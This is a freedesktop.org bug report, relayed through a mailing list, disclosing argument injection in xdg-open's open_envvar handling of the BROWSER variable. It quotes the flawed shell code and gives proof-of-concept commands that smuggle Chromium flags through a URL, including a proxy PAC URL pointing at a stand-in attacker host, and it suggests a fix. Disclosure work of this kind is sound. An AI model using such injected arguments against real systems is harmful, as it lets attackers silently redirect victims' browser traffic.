[Portland-bugs] [Bug 103807] New: Argument injection in xdg-open open_envvar

[bugzilla-daemon at freedesktop.org]

https://bugs.freedesktop.org/show_bug.cgi?id=103807

            Bug ID: 103807
           Summary: Argument injection in xdg-open open_envvar
           Product: Portland
           Version: unspecified
          Hardware: All
                OS: All
            Status: NEW
          Severity: major
          Priority: medium
         Component: xdg-utils
          Assignee: portland-bugs at lists.freedesktop.org
          Reporter: gabriel.corona at enst-bretagne.fr

xdg-open open_envvar is vulnerable to argument injection when BROWSER contains
%s:

This command:

    BROWSER="chromium %s" xdg-open "http://www.example.com/ --incognito"

will open incognito mode of chromium (when open_envvar mode is used).

The corresponding code is:

    if echo "$browser" | grep -q %s; then
      $(printf "$browser" "$1")

This could be abused to silently set chromium proxy configuration which would
allow an attacker to redirect all of the browser traffic through a server under
his control:

    BROWSER="chromium %s" xdg-open "http://www.example.com/
--proxy-pac-url=http://dangerous.example.com/proxy.pac"

One possible solution would be to URI-encode IFS characters in $1.

See https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881767 for a similar
problem in sensible-browser.

-- 
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.freedesktop.org/archives/portland-bugs/attachments/20171118/033cd823/attachment.html>